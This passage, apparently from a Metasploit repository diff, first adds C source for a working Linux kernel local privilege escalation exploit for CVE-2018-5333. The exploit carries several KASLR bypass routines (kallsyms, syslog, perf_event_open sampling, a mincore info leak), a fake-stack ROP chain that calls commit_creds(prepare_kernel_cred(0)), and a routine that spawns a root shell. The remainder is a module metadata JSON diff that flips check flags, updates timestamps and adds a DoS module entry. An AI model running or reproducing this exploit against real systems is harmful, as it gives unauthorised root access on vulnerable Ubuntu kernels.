+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+
@@ -15,7 +15,7 @@
                      :<script>.Ac816/                        sENbove3101.404:    
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
-                      :hvensntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
                      :#OUTHOUSE-  -s:                       /corykennedyData:    
                      :$nmap -oS                              SSo.6178306Ence:    
                      :Awsm.da:                            /shMTl#beats3o.No.:    
@@ -220,7 +220,7 @@
    "path": "/modules/auxiliary/admin/atg/atg_client.rb",
    "is_install_path": true,
    "ref_name": "admin/atg/atg_client",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -649,7 +649,7 @@
    "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/cisco/cisco_secure_acs_bypass",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1364,7 +1364,7 @@
    "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1411,7 +1411,7 @@
    "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_fpt",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1458,7 +1458,7 @@
    "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "admin/http/contentkeeper_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -3615,7 +3615,7 @@
    "path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_administration",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -3665,7 +3665,7 @@
    "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_utf8_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -3717,7 +3717,7 @@
    "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/trendmicro_dlp_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5228,7 +5228,7 @@
    "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_findandsampledata",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5318,7 +5318,7 @@
    "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_ntlm_stealer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5567,7 +5567,7 @@
    "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
    "is_install_path": true,
    "ref_name": "admin/natpmp/natpmp_map",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5656,7 +5656,7 @@
    "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/officescan/tmlisten_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6348,7 +6348,7 @@
    "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
    "is_install_path": true,
    "ref_name": "admin/sap/sap_mgmt_con_osexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -6828,7 +6828,7 @@
    "path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/check_dir_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6867,7 +6867,7 @@
    "path": "/modules/auxiliary/admin/smb/delete_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/delete_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6906,7 +6906,7 @@
    "path": "/modules/auxiliary/admin/smb/download_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/download_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6994,7 +6994,7 @@
    "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/ms17_010_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7043,7 +7043,7 @@
    "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7164,7 +7164,7 @@
    "path": "/modules/auxiliary/admin/smb/upload_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7204,7 +7204,7 @@
    "path": "/modules/auxiliary/admin/smb/webexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/webexec_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7279,11 +7279,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-13 13:09:01 +0000",
+    "mod_time": "2019-11-01 19:21:47 +0000",
    "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
    "is_install_path": true,
    "ref_name": "admin/teradata/teradata_odbc_sql",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -7801,7 +7801,7 @@
    "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/wdbrpc_reboot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -8684,7 +8684,7 @@
    "path": "/modules/auxiliary/bnat/bnat_scan.rb",
    "is_install_path": true,
    "ref_name": "bnat/bnat_scan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9032,7 +9032,7 @@
    "path": "/modules/auxiliary/crawler/msfcrawler.rb",
    "is_install_path": true,
    "ref_name": "crawler/msfcrawler",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9307,7 +9307,7 @@
    "path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tkey",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9348,7 +9348,7 @@
    "path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tsig",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9610,7 +9610,7 @@
    "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/apache_range_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -10101,6 +10101,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_dos/http/metasploit_httphandler_dos": {
+    "name": "Metasploit HTTP(S) handler DoS",
+    "fullname": "auxiliary/dos/http/metasploit_httphandler_dos",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-04",
+    "type": "auxiliary",
+    "author": [
+      "Jose Garduno, Dreamlab Technologies AG",
+      "Angelo Seiler, Dreamlab Technologies AG"
+    ],
+    "description": "This module exploits the Metasploit HTTP(S) handler by sending\n        a specially crafted HTTP request that gets added as a resource handler.\n        Resources (which come from the external connections) are evaluated as RegEx\n        in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n        Tested against Metasploit 5.0.20.",
+    "references": [
+      "CVE-2019-5645"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-12-26 13:31:38 +0000",
+    "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb",
+    "is_install_path": true,
+    "ref_name": "dos/http/metasploit_httphandler_dos",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_dos/http/monkey_headers": {
    "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)",
    "fullname": "auxiliary/dos/http/monkey_headers",
@@ -11027,7 +11074,7 @@
    "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/ntp/ntpd_reserved_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -11107,7 +11154,7 @@
    "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
    "is_install_path": true,
    "ref_name": "dos/rpc/rpcbomb",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -11279,7 +11326,7 @@
    "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
    "is_install_path": true,
    "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -13660,7 +13707,7 @@
    "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/dns/dns_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -13735,7 +13782,7 @@
    "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ftp/ftp_pre_post",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -13893,7 +13940,7 @@
    "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -14205,7 +14252,7 @@
    "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/smtp/smtp_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15119,7 +15166,7 @@
    "path": "/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/c2s_dvr_password_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15203,7 +15250,7 @@
    "path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/cerberus_helpdesk_hash_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -16179,11 +16226,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/gather/get_user_spns.py",
    "is_install_path": true,
    "ref_name": "gather/get_user_spns",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -16224,7 +16271,7 @@
    "path": "/modules/auxiliary/gather/hp_enum_perfd.rb",
    "is_install_path": true,
    "ref_name": "gather/hp_enum_perfd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -16726,7 +16773,7 @@
    "path": "/modules/auxiliary/gather/ipcamera_password_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/ipcamera_password_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17038,7 +17085,7 @@
    "path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "gather/konica_minolta_pwd_extract",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -17219,7 +17266,7 @@
    "path": "/modules/auxiliary/gather/memcached_extractor.rb",
    "is_install_path": true,
    "ref_name": "gather/memcached_extractor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17389,7 +17436,7 @@
    "path": "/modules/auxiliary/gather/natpmp_external_address.rb",
    "is_install_path": true,
    "ref_name": "gather/natpmp_external_address",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17478,7 +17525,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_bootparamd_domain",
@@ -17516,7 +17563,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/gather/nis_ypserv_map.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_ypserv_map",
@@ -17797,7 +17844,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-10-31 13:07:41 +0000",
+    "mod_time": "2020-01-14 00:34:06 +0000",
    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/pulse_secure_file_disclosure",
@@ -18450,7 +18497,7 @@
    "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_deployment_services_shares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -18594,7 +18641,7 @@
    "path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb",
    "is_install_path": true,
    "ref_name": "gather/wp_w3_total_cache_hash_extract",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -18975,7 +19022,7 @@
    "path": "/modules/auxiliary/scanner/acpp/login.rb",
    "is_install_path": true,
    "ref_name": "scanner/acpp/login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19013,7 +19060,7 @@
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19050,7 +19097,7 @@
